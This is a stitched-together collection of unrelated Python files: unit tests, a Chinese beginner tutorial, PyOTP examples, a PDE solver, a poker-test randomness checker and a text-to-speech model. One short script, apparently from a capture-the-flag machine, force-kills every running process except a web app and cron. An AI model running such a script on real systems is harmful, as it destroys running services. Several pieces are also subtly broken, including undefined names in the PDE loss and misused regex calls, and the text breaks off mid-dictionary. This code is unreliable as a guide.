print("sum list in for [1,1,1,1] returned:" + str(sum_list_for([1, 1, 1, 1])),
      " 'PASSED'" if sum_list_for([1, 1, 1, 1]) == 4 else " 'FAILED'")
print("********************************************")
print("Test ex1 sum list with reduce")
print("sum list with reduce [1,2,3,4] returned:" + str(sum_list_reduce([1, 2, 3, 4])),
      " 'PASSED'" if sum_list_reduce([1, 2, 3, 4]) == 10 else " 'FAILED'")
print("********************************************")
print("Test ex1 sum list with built in sum")
print("sum list with built in sum [1,2,3,4] returned:" + str(sum_list_sum_func([1, 2, 3, 4])),
      " 'PASSED'" if sum_list_sum_func([1, 2, 3, 4]) == 10 else " 'FAILED'")
print("********************************************")
print("Test ex1 functions with tuple:")
print("sum list in for (1,2,3,4) returned:" + str(sum_list_for((1, 2, 3, 4))))
print("sum_list_reduce (1,2,3,4) returned:" + str(sum_list_reduce((1, 2, 3, 4))))
print("sum_list_sum_func (1,2,3,4) returned:" + str(sum_list_sum_func((1, 2, 3, 4))))
print("********************************************")
print("Test ex2")
print(list_comp())
print("********************************************")
print("Test ex3")
print("Ex3 boom_7_for: ", end=" ")
print(boom_7_for(21))
print("Ex3 boom_7_list_comprehension: ", end=" ")
print(boom_7_list_comprehension(21))
print("Ex3 boom_7_map: ", end=" ")
print(boom_7_map(21))
print("********************************************")
print("Test ex4")
print(dict_to_list(['a', 'b', 'c']))
print(dict_to_list_comp(['a', 'b', 'c']))
print("********************************************")
print("Test ex5")
print("********************************************")
print(count_number_of_arguments())
print(count_number_of_arguments(1))
print(count_number_of_arguments(1, 2))
print("********************************************")
print("Test ex6")
func(1, 2, 3, name="hello")
func(1, 2, 3)
print("********************************************")
print("Test ex7")
add_3 = make_adder(3)
print("add_3(5):" + str(add_3(5)))
print("add_3(3):" + str(add_3(3)))
add_7 = make_adder(7)
print("add_7(1):" + str(add_7(1)))
print("add_7(-3):" + str(add_7(-3)))
# -*- coding: utf-8 -*-
from __future__ import unicode_literals

import datetime

import transaction


def test_displays_list_of_log_entries(browser):
    from sw.allotmentclub import Log, User
    User.create(id=2, username='sw', vorname='Sebastian', nachname='Wehrmann')
    Log.create(user_id=2, name='user data', level='INFO',
               created=datetime.datetime.now(), msg='Test-Log-Eintrag')
    transaction.commit()
    browser.login()
    browser.open('http://localhost/')
    assert {
        'username': 'sw',
        'firstname': 'Sebastian',
        'lastname': 'Wehrmann',
        'gravatar_url': 'https://www.gravatar.com/avatar/'
                        'd41d8cd98f00b204e9800998ecf8427e',
        'detail': ['Test-Log-Eintrag'],
        'time': 'gerade eben'
    } in browser.json['data']['timeline']


def test_fa_icon_if_system_user(browser):
    from sw.allotmentclub import Log, User
    user = User.find_or_create(username='system')
    Log.create(user=user, name='user data', level='INFO',
               created=datetime.datetime.now(), msg='Test-Log-Eintrag')
    transaction.commit()
    browser.login()
    browser.open('http://localhost/')
    timeline = browser.json['data']['timeline'][0]
    assert timeline['fa_icon'] == 'fa-gear'
    assert 'gravatar_url' not in timeline
#一 import keyword print(keyword.kwlist) #打印关键字 #二 a = 'app\nle' a2 = r'app\nle' #加r是防止字符转义的,加r和不加''r是有区别的,如果路径中出现'\t'(python中是空六格的意思)的话 不加r的话\t就会被转义 而加了'r'之后'\t'就能保留原有的样子 print(a) print(a2) #三 #打开一个文件,有两种方法 #方法一: file = open (r'C:\Users\Administrator\Desktop\PYTHON_LESSON\a.txt','r',encoding='utf-8') #'r,w,a,x' print(file.read()) file.close() #方法二:(更简洁) with open(r'C:\Users\Administrator\Desktop\PYTHON_LESSON\a.txt','r',encoding='utf-8') as file: print(file.read()) #read当成整体来读,readline是一行一行的读 #延伸 with open(r'C:\Users\Administrator\Desktop\PYTHON_LESSON\a.txt','r',encoding='utf-8') as file: a = file.read() print(a) res = a.count('a') #计算文件中a的值有几个,注意:计算出来的是不包括大写的A print(res) with open(r'C:\Users\Administrator\Desktop\PYTHON_LESSON\a.txt','r',encoding='utf-8') as file: a = file.read() pattern = re.compile(r'python') result = re.findall(a) #findall是查找所有的,意思是使用正则表达式去目标字符串匹配 result = str(result) #这个方法也行,与上面那个是一样的,string是你要查找的对象,可以更改 print(result) # 打开文件两种方法 # file = open(r'/Users/songluyao/Documents/PYTHON_LESSON/a.txt','r') # print (file.read()) # file.close() with open(r'/Users/songluyao/Documents/PYTHON_LESSON/a.txt','a') as file: file.write('22222ddddd\nqqdfadfaffaafdfafafaff') # print(file.read()) # 一些正则表达式的关键词 # w:以写方式打开, # a:以追加模式打开 (从 EOF 开始, 必要时创建新文件) # r+:以读写模式打开 # w+:以读写模式打开 (参见 w ) # a+:以读写模式打开 (参见 a ) # rb:以二进制读模式打开 # wb:以二进制写模式打开 (参见 w ) # ab:以二进制追加模式打开 (参见 a ) # rb+:以二进制读写模式打开 (参见 r+ ) # wb+:以二进制读写模式打开 (参见 w+ ) # ab+:以二进制读写模式打开 (参见 a+ )fp.read([size]) #四 # print(help(open)) # 使用help()查看帮助 # help(input) #五********************************************************* #if……else 如果,否则 和 elif 或者,再或者 #题目一: point = 100 if point >= 80 and point <=100: print('优秀') elif point >=60 and point<80: print('及格') elif point >=0 and point<60: print('不及格') else: print('非法分数') a = 1 b = 2 c = 1 if a+b>c and a+c>b and b+c>a: print("能组成一个三角形") else: print("不能组成一个三角形") #题目二: username = 'admin' password = '126' if username == 'admin' and password == '126': print('输入正确') else: print('账号或密码错误') # if username == 'admin' and password == '123': # print('输入正确') # elif username =='admin' and password != '123': # print('密码错误') # else: # print('非法输入') # score = 95 # if score >=90 and score <=100: # print('优秀') # if score >=95: # print('超优秀') # if score == 100: # print('相当优秀') # if score >0 and score <= 80: # print("及格") # fruit = ['apple','orange','banana','apple'] # fruit.pop() # print(fruit) # fruit.extend('watermelon') # print(fruit) # number = [2,1,5,53,8,9,23,6,9,8] # number.sort() # number.reverse() # number=number[::-1] # print(number) # 大小写转换 # 1、 string1 = “my name is john” 对这句话的首字母进行大写处理,并且把人名都变成大写 # str = "my name is john" # str = str[0:-4].capitalize()+str[-4:].upper() # print(str) # 第二节课上午 # 字符串取值 string = 'hello' print(string[4]) # 切片 string = '0123456789' print(string[0:5]) #能取到第二个参数的前面一位 print(string[:]) #从开始到结尾可以不用写值 # 步长 string = '0123456789' print(string[::2]) #步长为2,每两位取值,取第一个。 print(string[4::2]) #从下标第四个开始取值,步长为2。 # 字符串的方法 string = '0123456789' string.join print(string.count('0')) #计算字符串中0出现的次数,统计 import re #导入正则表达式 #re表示regular expression 正则表达式 是匹配用的 string = 'hh0123456789abccdefghijklmnjjq7181910' pattern = re.compile(r'a') #pattern其实是一个正则表达式,此句意思是制作一个正则表达式,引号里面是匹配的内容,可以更改 result = re.findall(pattern,string) #findall是查找所有的,意思是使用正则表达式去目标字符串匹配 result = pattern.findall(string) #这个方法也行,与上面那个是一样的,string是你要查找的对象,可以更改 print(result) #打印出来的格式一般是list格式 result = str(result) print(string.count('a')) # 转换成字符串格式 a = 1 str(a) #把a转换成字符串 print(type(a)) import re #导入正则表达式 #re表示regular expression 正则表达式 是匹配用的 
string = 'hh0123456789abccdefghijklmnjjq7181910' pattern = re.compile(r'a') #pattern其实是一个正则表达式,此句意思是制作一个正则表达式,引号里面是匹配的内容,可以更改 result = re.findall(pattern,string) #findall是查找所有的,意思是使用正则表达式去目标字符串匹配 result = pattern.findall(string) #这个方法也行,与上面那个是一样的,string是你要查找的对象,可以更改 print(result) #打印出来的格式一般是list格式 result = str(result) print(string.count('a')) string = 'hh0123456789abccdefghijklmnjjq7181910' a = string.capitalize() #首字母大写 a = string.upper() #所有字母大写 a = string.lower() #所有字母小写 a = string.islower() #是否全部是小写 a = string.isdigit() # 是否全部是数字 a = string.find('2') #找2第一次出现的地方,find如果找不到返回结果为-1 a = string.index('2') #index找不到会报错 #如果变量出现了多次,以最后一次为准 #列表 list1 = [1,2,'a',"666",a] fruit = ['apple','banana','orange'] print(fruit[0]) #字符串和list都支持切片 print(fruit[0][1]) #可以把里面的字母取出来 p #reverse 反向的意思 fruit.reverse() #将列表倒序排序 fruit.remove('apple') #删除列表中的一个元素 fruit.remove(string) 只能删除一个,有多个页只能删除第一个,再想删就多写几个 fruit.pop(1) #pop也是删除,里面写的是下标,如果pop为空,默认删除的是最后一个元素,是先进后出的原则(栈),即先插入进去的,最后一个出来。 fruit.append('watermalon') #添加,拼接的意思 添加一个字符串 fruit.append(['a','b','c']) #添加一个list,默认是把一个list添加进list,后面添加的一个东西当做一个整体添加进去的 fruit.extend('watermalon') #添加的意思,无论后面是什么,只要能切片,都能切好,添加的一定是一个集合 print(fruit) list2 = fruit.copy() #浅复制 #浅复制:单纯把某个地址拿来用,只是拿内存地址 #深复制:不会随着原来的值的改变而改变,是一个全新的对象,不再与原来的对象有任何关联。 import copy fruit = ['apple','banana','orange'] list3 = copy.deepcopy(fruit) print(list3) fruit.clear() #清空 fruit.index('banana') #查找 fruit.insert(0,'a') #插入,将a插入到下标0的地方,参数1为下标,参数2为插入的值 # 排序 number = [1,2,3,4,5,12,442,38,64,88,55] number.sort() #从小到大排序 number.reverse() #从小大大排序后反向即可按照从大到小排序 number = number[::-1] #此方法也可以从大到小排序。默认步长为1,倒着走 sor = sorted(number) print(sor) #此方法是生成了一个新的列表且是排序后的,之前的列表是没有更改的。 #即sort是把原来列表排列了,对原来列表起作用,sorted是把排好的结果放在一个新的list中 #用正则表达式查找列表中的某个字母的总数 import re fruit = ['apple','banana','orange'] pattern = re.compile(r'a') res = pattern.findall(fruit) count = str(res).count('a') print(count) #类型转换 s = 'apple' lis = list(s) #把一个对象转换成list str() #转化为字符串 list() #转化为列表 int() #转化为数字 float() #转化为小数 tuple() #转换为元祖 #tuple 元祖 元祖也有切片 tup = ('apple','orange','banana') print(tup[::1]) # tuple本身不能被更改,extend、append、insert方法不行,里面东西是定死的,增删改都不行,可以查询 tup.count('apple') #可以查询 tup.index('apple') # dict 字典 en_ch = {'apple':'苹果','orange':'橘子','banana':'香蕉'} #字典里面的东西是一对一对的 print(en_ch['apple']) #打印的是apple后面的值 en_ch.clear #清空字典 en_ch.pop('apple') #删除,给的是key en_ch.popitem() #随机删除,不需要给值 en_ch.get('banana') #跟print(en_ch['banana'])一样,都是取值,,en_ch.get('banana') 这个没有,提示none, # 如果用print(en_ch['banana']),会提示报错 en_ch.values() #所有的值 en_ch.keys() #所有的键 en_ch.items() #信息一对一对取出来 en_ch.fromkeys() #生成一个新的字典,可以给一个值,也可以给两个值,一个值报错none,两个值,前面的是key,后面的是值 a = en_ch.fromkeys('asa','s') print(a) #延伸 fruit = ['a','erer','eeee','rtgg'] s = ''.join(fruit) print(s[1]) #此方法是把列表转换成字符串,且里面的各种括号,符号都没有了,如【 ’,如果直接用str会带出这些符号东西 #字典中的值修改 # 先取出来,然后给个新的值 en_ch = {'apple':'苹果','orange':'橘子','banana':'香蕉'} en_ch['banana'] = 'xiangjiao' print(en_ch) #字典中添加值 en_ch = {'apple':'苹果','orange':'橘子','banana':'香蕉'} en_ch['grape'] = '葡萄' print(en_ch)
#
# Copyright(c) 2012-2021 Intel Corporation
# SPDX-License-Identifier: BSD-3-Clause
#

import pytest
import subprocess
import unittest.mock as mock

from opencas import casadm
from helpers import get_process_mock


@mock.patch("subprocess.run")
def test_run_cmd_01(mock_run):
    mock_run.return_value = get_process_mock(0, "successes", "errors")
    result = casadm.run_cmd(["casadm", "-L"])

    assert result.exit_code == 0
    assert result.stdout == "successes"
    assert result.stderr == "errors"
    mock_run.assert_called_once_with(
        ["casadm", "-L"],
        stdout=subprocess.PIPE,
        stderr=subprocess.PIPE,
        universal_newlines=mock.ANY,
    )


@mock.patch("subprocess.run")
def test_run_cmd_02(mock_run):
    mock_run.return_value = get_process_mock(4, "successes", "errors")

    with pytest.raises(casadm.CasadmError):
        casadm.run_cmd(["casadm", "-L"])


@mock.patch("subprocess.run")
def test_get_version_01(mock_run):
    mock_run.return_value = get_process_mock(0, "0.0.1", "errors")
    result = casadm.get_version()

    assert result.exit_code == 0
    assert result.stdout == "0.0.1"
    assert result.stderr == "errors"
    mock_run.assert_called_once_with(
        [casadm.casadm_path, "--version", "--output-format", "csv"],
        stdout=subprocess.PIPE,
        stderr=subprocess.PIPE,
        universal_newlines=mock.ANY,
    )


@mock.patch("subprocess.run")
def test_get_version_02(mock_run):
    mock_run.return_value = get_process_mock(4, "successes", "errors")

    with pytest.raises(casadm.CasadmError):
        casadm.get_version()
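# Note: the tests above rely on a get_process_mock() helper imported from a local
# "helpers" module that is not included in this listing. Below is a minimal sketch of
# such a helper, assuming it only needs to mimic the returncode/stdout/stderr
# attributes of subprocess.CompletedProcess (an assumption based on how the mock is
# used above, not the project's actual implementation).

import unittest.mock as mock


def get_process_mock(returncode, stdout, stderr):
    # Build a stand-in for subprocess.CompletedProcess with the given fields.
    process_mock = mock.Mock()
    process_mock.returncode = returncode
    process_mock.stdout = stdout
    process_mock.stderr = stderr
    return process_mock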
import os
import signal

out = os.popen("ps -ef").read()
for line in list(out.splitlines())[1:]:
    try:
        pid = int(line.split()[1])
        ppid = int(line.split()[2])
        cmd = " ".join(line.split()[7:])
        print(pid, ppid, cmd)
        if ppid in [0, 1] and cmd in ["/usr/local/bin/python3.8 /home/ctf/web/app.py",
                                      "/usr/sbin/cron",
                                      "tail -f /var/log/cron"]:
            continue
        os.kill(pid, signal.SIGKILL)
    except Exception as e:
        pass
"""[4.2.6-2] Diffusion-reaction PDEs Implemented with Pytorch.(torch version >= 1.8.1) * Variable interpretation: - x: torch.Tensor, (Number of points, dimension) - """ import sys, os from copy import deepcopy import random from random import randint import json from tqdm import tqdm import numpy as np import torch import torch.nn as nn import torch.optim as optim from torch.autograd import grad import matplotlib.pyplot as plt from train import train # >>> global params definition (same as 4.2.3)>>> PARAMS = { 'name': 'ParabolicEqnInvTime', 't0': 0, 'T': 1., 'N': 10, 'dim': 10, 'left boundary': -1, 'right boundary': 1, 'K_primal': 2, 'K_adv': 1, 'lr_primal': 0.015, 'lr_adv': 0.04, 'Nr': None, 'Nb': None, 'Na': None, 'alpha': None, 'gamma': None, 'use elu': False, 'n_iter': 20000, } # update PARAMS['Nr'] = PARAMS['dim'] * 4000 PARAMS['Nb'] = PARAMS['dim'] * PARAMS['dim'] * 40 PARAMS['Na'] = PARAMS['Nb'] PARAMS['alpha'] = PARAMS['Nb'] * 10000 PARAMS['alpha'] = PARAMS['Nb'] * 10000 DEVICE = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu') # <<< global params definition <<< torch.set_default_tensor_type(torch.DoubleTensor) random.seed(0) torch.manual_seed(0) torch.cuda.manual_seed(0) np.random.seed(0) # >>> Numerical function definition >>> def h(x): """Initial constraint (also a coefficient in g) """ return 2.0 * torch.sin(np.pi / 2.0 * x[:, 0]) * torch.cos(np.pi / 2.0 * x[:, 1]) def g(x, _h): """ :u* Dirichlet boundary / ground truth function -1 indicates the dimension of 'time' """ return _h * torch.exp(-1. * x[:, -1]) def f(x, _g): """ R.H.S of PDE """ return (np.pi * np.pi - 2.0) * _g / 2.0 - _g * _g / torch.cos(np.pi / 2.0 * x[:, 1]) def loss_all(xr: torch.Tensor, xr_t0: torch.Tensor, xr_T: torch.Tensor, xb: torch.Tensor, u_theta, phi_eta, alpha, gamma, device): """ Args: torch.Tensor: (Nr x d) torch.Tensor: (Nb x d) Network instance Network instance alpha: weight constant Returns: torch.Tensor: (1 x 1) """ # Calculate derivative w.r.t. to x xr = Variable(xr, requires_grad=True) xr_t0 = Variable(xr_t0, requires_grad=True) xr_T = Variable(xr_T, requires_grad=True) # Calculate derivative w.r.t. to x[x1, x2, ...] _out_u_theta = torch.sum(u_theta(xr)) _grad_u_theta = grad(_out_u_theta, xr, create_graph=True)[0] _out_phi_eta = torch.sum(phi_eta(xr)) _grad_phi_eta = grad(_out_phi_eta, xr, create_graph=True)[0] # feed forward _phi_eta = phi_eta(xr) # comp. graph => loss _u_theta_bdry = u_theta(xb) # comp. graph => loss # <<< PDE-specific: calculate for I <<< # do something # <<< PDE-specific: calculate for I <<< loss_int = 2 * torch.log(I_sum) - torch.log( torch.sum(_phi_eta * _phi_eta) ) loss_bdry = torch.sum( (_u_theta_bdry - g(xb))**2 ) / xb.shape[0] return loss_int + loss_bdry * alpha + loss_init * gamma # <<< Numerical function definition <<< if __name__ == '__main__': train(params=PARAMS, g=g, loss_func=loss_all, device=DEVICE, requires_time=True)
from django.test import TestCase, tag

from users.models import User
from users.tests.mixin import UserTestMixin


@tag('model')
class TestUserModel(UserTestMixin, TestCase):

    @classmethod
    def setUpTestData(cls):
        pass

    @tag('standard')
    def test_user_manager_create_success(self):
        # given
        user_data = {
            'username': 'jimmy',
            'password': '123qweasd',
        }

        # when
        user = User.objects.create(**user_data)

        # then
        # Should have password hashed
        self.assertNotEqual(user_data['password'], user.password)
        self.assertTrue(user.check_password(user_data['password']))
from Command.Command import Command
from AudioExtraction.AudioExtractor import AudioExtractor
from AudioExtraction.Mp4Video import Mp4Video
from glob import glob
import os

from Utilities import Utilities as util


def validate(args):
    if args.file is None:
        return False
    if args.run is None and args.extract != 'audio':
        return False
    return True


class AudioExtractionCommand(Command):
    def __init__(self, next):
        super().__init__(next)

    def handle(self, args):
        if validate(args):
            file = util.getVideoPath(args.file)
            target = util.getAudioFilePath(args.file)
            if not os.path.exists(target):
                print('Extracting audio from video file: {}'.format(file))
                audioExtractor = AudioExtractor(Mp4Video(file, target))
                audioExtractor.apply()
            else:
                print('Already exists audio file: {}'.format(target))
        else:
            print('Skipping audio extraction.')
import scipy.stats as st


def NumerosIgualesPornumero(listaaleatoria):
    # Classify each group of digits as a poker-test "hand" from its digit counts
    todos = []
    for t in listaaleatoria:
        c1 = ''
        lista = [0] * 10
        for numero in range(0, 10):
            lista[numero] = t.count(str(numero))
        for l in range(len(lista)):
            if lista[l] == 1:
                for k in range(l + 1, len(lista)):
                    if lista[k] == 1:
                        for j in range(k + 1, len(lista)):
                            if lista[j] == 1:
                                for m in range(j + 1, len(lista)):
                                    if lista[m] == 1:
                                        c1 = 'Distintos'
                                    elif lista[m] == 2:
                                        c1 = 'Un Par'
                            elif lista[j] == 2:
                                c1 = 'Un Par'
                            elif lista[j] == 3:
                                c1 = 'Pierna'
                    elif lista[k] == 2:
                        for n in range(k + 1, len(lista)):
                            if lista[n] == 1:
                                c1 = 'Un Par'
                            elif lista[n] == 2:
                                c1 = 'Doble Par'
                    elif lista[k] == 3:
                        c1 = 'Pierna'
                    elif lista[k] == 4:
                        c1 = 'Poker'
            elif lista[l] == 2:
                for o in range(l + 1, len(lista)):
                    if lista[o] == 1:
                        for p in range(o + 1, len(lista)):
                            if lista[p] == 1:
                                c1 = 'Un Par'
                            elif lista[p] == 2:
                                c1 = 'Doble Par'
                    elif lista[o] == 2:
                        c1 = 'Doble Par'
                    elif lista[o] == 3:
                        c1 = 'Par y Pierna'
            elif lista[l] == 3:
                for k in range(l + 1, len(lista)):
                    if lista[k] == 1:
                        c1 = 'Pierna'
                    elif lista[k] == 2:
                        c1 = 'Par y Pierna'
            elif lista[l] == 4:
                c1 = 'Poker'
            elif lista[l] == 5:
                c1 = 'Quintilla'
        todos.append(c1)
    return todos


def Poker(todos, m):
    # Expected frequency of each hand
    feDis = 0.3024 * m
    fePar = 0.5040 * m
    fePierna = 0.072 * m
    feFull = 0.0090 * m
    feDoble = 0.1080 * m
    fePoker = 0.0045 * m
    feQuntilla = 0.0001 * m
    # Observed frequency of each hand
    foDis = todos.count('Distintos')
    foPar = todos.count('Un Par')
    foPierna = todos.count('Pierna')
    foFull = todos.count('Par y Pierna')
    foDoble = todos.count('Doble Par')
    foPoker = todos.count('Poker')
    foQuntilla = todos.count('Quintilla')
    # Chi-square statistic for the poker test
    cDis = ((feDis - foDis) ** 2) / feDis
    cPar = ((fePar - foPar) ** 2) / fePar
    cPierna = ((fePierna - foPierna) ** 2) / fePierna
    cFull = ((feFull - foFull) ** 2) / feFull
    cDoble = ((feDoble - foDoble) ** 2) / feDoble
    cPoker = ((fePoker - foPoker) ** 2) / fePoker
    cQuintilla = ((feQuntilla - foQuntilla) ** 2) / feQuntilla
    ct = cDis + cPar + cPierna + cFull + cDoble + cPoker + cQuintilla
    if ct <= st.chi2.ppf(0.95, 6):  # confidence level and degrees of freedom
        print('The hypothesis is accepted: the numbers are random')
    else:
        print('The hypothesis is not accepted')


if __name__ == "__main__":
    lista = []
    listaJugadas = NumerosIgualesPornumero(lista)
    Poker(listaJugadas, len(listaJugadas))
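# The expected-frequency constants used in Poker() above are the standard poker-test
# probabilities for groups of five decimal digits. The small self-check below derives
# them from basic combinatorics; it introduces no assumptions beyond the constants
# already hard-coded in Poker(), and is included only to document where they come from.

from math import comb

n = 10 ** 5  # number of equally likely 5-digit groups
p = {
    'Distintos':    10 * 9 * 8 * 7 * 6 / n,                      # all different   -> 0.3024
    'Un Par':       10 * comb(5, 2) * 9 * 8 * 7 / n,             # one pair        -> 0.5040
    'Doble Par':    comb(10, 2) * comb(5, 2) * comb(3, 2) * 8 / n,  # two pairs    -> 0.1080
    'Pierna':       10 * comb(5, 3) * 9 * 8 / n,                 # three of a kind -> 0.0720
    'Par y Pierna': 10 * comb(5, 3) * 9 / n,                     # full house      -> 0.0090
    'Poker':        10 * comb(5, 4) * 9 / n,                     # four of a kind  -> 0.0045
    'Quintilla':    10 / n,                                      # five of a kind  -> 0.0001
}
assert abs(sum(p.values()) - 1.0) < 1e-12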
#!/usr/bin/env python
# Created by MikBac on 2020

import sys

for line in sys.stdin:
    line = line.strip()
    fields = line.split('\t')
    if len(fields) == 1:
        print(fields[0])
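# A Hadoop-streaming-style mapper like the one above can be exercised locally by piping
# sample records through it. The file name "mapper.py" and the sample input below are
# assumptions for illustration only; the mapper emits a line only when the record has a
# single tab-separated field.

import subprocess

sample_input = "only-one-field\nfield1\tfield2\n"  # second record has two fields and is dropped
result = subprocess.run(
    ["python", "mapper.py"],
    input=sample_input,
    capture_output=True,
    text=True,
)
print(result.stdout)  # expected output: "only-one-field"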
""" Tests the channel_entrainment derived class """ from __future__ import absolute_import __all__ = ["test"] from ...._globals import _RECOGNIZED_ELEMENTS_ from .._entrainment import channel_entrainment from ....testing import moduletest from ....testing import unittest @moduletest def test(run = True): """ Run all tests on the channel_entrainment derived class """ return ["vice.core.dataframe.channel_entrainment", [ test_initialization(), test_setitem() ] ] @unittest def test_initialization(): """ Initialization unit test """ def test(): """ Tests the initialization of the channel_entrainment derived class """ global _TEST_FRAME_ _TEST_FRAME_ = dict(zip( _RECOGNIZED_ELEMENTS_, len(_RECOGNIZED_ELEMENTS_) * [1.] )) try: _TEST_FRAME_ = channel_entrainment(_TEST_FRAME_) except: return False return isinstance(_TEST_FRAME_, channel_entrainment) return ["vice.core.dataframe.channel_entrainment.__init__", test] @unittest def test_setitem(): """ __setitem__ unit test """ def test(): """ Tests the __setitem__ function """ try: for i in _RECOGNIZED_ELEMENTS_: _TEST_FRAME_[i] = 0.5 except: return False return _TEST_FRAME_ == channel_entrainment(dict(zip( _RECOGNIZED_ELEMENTS_, len(_RECOGNIZED_ELEMENTS_) * [0.5] ))) return ["vice.core.dataframe.channel_entrainment.__setitem__", test]
# https://pyotp.readthedocs.io/en/latest/
# cd D:\2018_working\coding\googleAuthenticator
# https://tools.ietf.org/html/rfc4226

import pyotp
import time

totp = pyotp.TOTP('base32secret3232')
temp = totp.now()
temp

# OTP verified for current time
totp.verify(temp)  # => True
time.sleep(30)
totp.verify(temp)  # => False

# as above but with loop to identify time to fail
temp = totp.now()
temp
totp.verify(temp)  # => True
tracker = 0
while True:
    if totp.verify(temp):
        tracker += 1
        print("tracker:", tracker)
        time.sleep(1)
    else:
        print("totp.verify(temp) returned false")
        break
print("tracker:", tracker)

# counter based one time passwords
hotp = pyotp.HOTP('base32secret3232')
hotp.at(0)  # => '260182'
hotp.at(1)  # => '055283'
temp = hotp.at(1401)  # => '316439'
temp

# OTP verified with a counter
hotp.verify(temp, 1401)  # => True
hotp.verify(temp, 1402)  # => False

# https://pypi.org/project/pyotp/
pyotp.totp.TOTP('JBSWY3DPEHPK3PXP').provisioning_uri("[email protected]", issuer_name="Secure App")
temp = pyotp.hotp.HOTP('JBSWY3DPEHPK3PXP').provisioning_uri("[email protected]", initial_count=0, issuer_name="bmtTest")

import qrcode
import pyotp

mykey = 'JBSWY3DPEHPK3PXP'
temp = pyotp.hotp.HOTP(mykey).provisioning_uri("[email protected]", issuer_name="bmtTest")
img = qrcode.make(temp)
img.save("image.jpg")

totp = pyotp.TOTP(mykey)
print("Current OTP:", totp.now())

# https://github.com/neocotic/qrious

import datetime
datetime.datetime.now()

import numpy as np
str(np.datetime64('now'))
str(np.datetime64('today'))

import pandas as pd
str(pd.to_datetime('now'))
str(pd.to_datetime('today'))

# returns local timezone time
from time import gmtime, strftime
print(strftime("%z", gmtime()))

import time
time.tzname

import datetime
tz_string = datetime.datetime.now(datetime.timezone.utc).astimezone().tzname()
tz_string

time.timezone / -(60 * 60)
from .manager import ExperimentManager class ExperimentsMiddleware(object): """Experiments middleware. Binds the convenient :class:`ExperimentManager` to the request. """ def process_request(self, request): assert hasattr(request, 'session'), \ 'Django Banana requires session middleware to be installed' request.experiments = ExperimentManager(request.session)
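# Wiring sketch (the dotted path and view are illustrative assumptions, not taken
# from the project): the class above is an old-style middleware that only defines
# process_request, so it is listed via the legacy MIDDLEWARE_CLASSES setting and must
# come after Django's session middleware, which it asserts on. After that,
# request.experiments is available in every view.
from django.http import HttpResponse

MIDDLEWARE_CLASSES = [
    'django.contrib.sessions.middleware.SessionMiddleware',
    'banana.middleware.ExperimentsMiddleware',  # hypothetical dotted path
]


def landing_page(request):
    manager = request.experiments  # the ExperimentManager bound by the middleware
    return HttpResponse("ok")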
# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. from __future__ import division import numpy as np import paddle.fluid.layers as F import paddle.fluid.initializer as I import paddle.fluid.dygraph as dg class DeepVoice3(dg.Layer): def __init__(self, encoder, decoder, converter, speaker_embedding, use_decoder_states): """Deep Voice 3 TTS model. Args: encoder (Layer): the encoder. decoder (Layer): the decoder. converter (Layer): the converter. speaker_embedding (Layer): the speaker embedding (for multispeaker cases). use_decoder_states (bool): use decoder states instead of predicted mel spectrogram as the input of the converter. """ super(DeepVoice3, self).__init__() if speaker_embedding is None: self.n_speakers = 1 else: self.speaker_embedding = speaker_embedding self.encoder = encoder self.decoder = decoder self.converter = converter self.use_decoder_states = use_decoder_states def forward(self, text_sequences, text_positions, valid_lengths, speaker_indices, mel_inputs, frame_positions): """Compute predicted value in a teacher forcing training manner. Args: text_sequences (Variable): shape(B, T_enc), dtype: int64, text indices. text_positions (Variable): shape(B, T_enc), dtype: int64, positions of text indices. valid_lengths (Variable): shape(B, ), dtype: int64, valid lengths of utterances. speaker_indices (Variable): shape(B, ), dtype: int64, speaker indices for utterances. mel_inputs (Variable): shape(B, T_mel, C_mel), dytpe: int64, ground truth mel spectrogram. frame_positions (Variable): shape(B, T_dec), dtype: int64, positions of decoder steps. Returns: (mel_outputs, linear_outputs, alignments, done) mel_outputs (Variable): shape(B, T_mel, C_mel), dtype float32, predicted mel spectrogram. mel_outputs (Variable): shape(B, T_mel, C_mel), dtype float32, predicted mel spectrogram. alignments (Variable): shape(N, B, T_dec, T_enc), dtype float32, predicted attention. done (Variable): shape(B, T_dec), dtype float32, predicted done probability. (T_mel: time steps of mel spectrogram, T_lin: time steps of linear spectrogra, T_dec, time steps of decoder, T_enc: time steps of encoder.) """ if hasattr(self, "speaker_embedding"): speaker_embed = self.speaker_embedding(speaker_indices) else: speaker_embed = None keys, values = self.encoder(text_sequences, speaker_embed) mel_outputs, alignments, done, decoder_states = self.decoder( (keys, values), valid_lengths, mel_inputs, text_positions, frame_positions, speaker_embed) linear_outputs = self.converter(decoder_states if self.use_decoder_states else mel_outputs, speaker_embed) return mel_outputs, linear_outputs, alignments, done def transduce(self, text_sequences, text_positions, speaker_indices=None): """Generate output without teacher forcing. Only batch_size = 1 is supported. Args: text_sequences (Variable): shape(B, T_enc), dtype: int64, text indices. text_positions (Variable): shape(B, T_enc), dtype: int64, positions of text indices. 
            speaker_indices (Variable): shape(B, ), dtype: int64, speaker indices for utterances.

        Returns:
            (mel_outputs, linear_outputs, alignments, done)
            mel_outputs (Variable): shape(B, T_mel, C_mel), dtype float32, predicted mel spectrogram.
            linear_outputs (Variable): shape(B, T_lin, C_lin), dtype float32, predicted linear spectrogram.
            alignments (Variable): shape(B, T_dec, T_enc), dtype float32, predicted average attention of all attention layers.
            done (Variable): shape(B, T_dec), dtype float32, predicted done probability.
            (T_mel: time steps of mel spectrogram, T_lin: time steps of linear spectrogram, T_dec, time steps of decoder, T_enc: time steps of encoder.)
        """
        if hasattr(self, "speaker_embedding"):
            speaker_embed = self.speaker_embedding(speaker_indices)
        else:
            speaker_embed = None

        keys, values = self.encoder(text_sequences, speaker_embed)
        mel_outputs, alignments, done, decoder_states = self.decoder.decode(
            (keys, values), text_positions, speaker_embed)
        linear_outputs = self.converter(
            decoder_states if self.use_decoder_states else mel_outputs,
            speaker_embed)
        return mel_outputs, linear_outputs, alignments, done
from datetime import datetime

import fire

YEAR = 2000
ZODIAC_SIGNS = {
    (datetime(YEAR, 1, 20), datetime(YEAR, 2, 18)): "水瓶座",
    (datetime(YEAR, 2, 19), datetime(YEAR, 3, 20)): "魚座",
